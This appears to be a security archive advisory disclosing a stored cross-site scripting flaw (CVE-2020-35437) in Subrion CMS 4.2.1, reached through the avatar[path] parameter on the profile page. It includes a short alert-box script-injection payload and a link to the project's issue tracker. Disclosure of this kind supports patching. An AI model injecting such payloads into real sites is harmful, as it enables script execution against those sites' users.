Subrion CMS 4.2.1 Cross Site Scripting

Subrion CMS 4.2.1 Cross Site Scripting: Posted Jan 5, 2021; Authored by icekam; Subrion CMS version 4.2.1 suffers from a cross site scripting vulnerability. Original discovered of cross site scripting in this version is attributed to Ismail Tasdelen in July of 2018.; tags | exploit, xss; advisories | CVE-2020-35437; SHA-256 | f0bbe3b93272b91607986b3d5bfdf565e64aaf4c369df0f1fa1378d2e3a9538e; Download | Favorite | View

Subrion CMS 4.2.1 Cross Site Scripting

# Exploit Title: Subrion CMS 4.2.1 - 'avatar[path]' XSS
# Date: 2020-12-15
# Exploit Author: icekam
# Vendor Homepage: https://subrion.org/ <https://www.icekam.com/>
# Software Link: https://github.com/intelliants/subrion
# Version: Subrion CMS 4.2.1
# CVE : CVE-2020-35437

stored xss vulnerability in /_core/profile/.
 Reproduce through the avatar[path] parameter in post /_core/profile/ url.
 payload:"><sCrIpT>alert(1)</sCrIpT>

https://github.com/intelliants/subrion/issues/880

Top Authors In Last 30 Days

Red Hat 308 files
Ubuntu 67 files
Debian 24 files
Gentoo 8 files
Google Security Research 7 files
LiquidWorm 6 files
Apple 5 files
Jann Horn 3 files
Spencer McIntyre 3 files
Milad Karimi 3 files

File Archives

Systems

AIX (430)
Apple (2,133)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,177)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,607)
HPUX (881)
iOS (395)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (52,160)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,495)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (10,025)
UNIX (9,482)
UnixWare (188)
Windows (6,786)
Other

Subrion CMS 4.2.1 Cross Site Scripting

Subrion CMS 4.2.1 Cross Site Scripting

File Archive:

December 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Subrion CMS 4.2.1 Cross Site Scripting

Share This

Subrion CMS 4.2.1 Cross Site Scripting

File Archive:

December 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems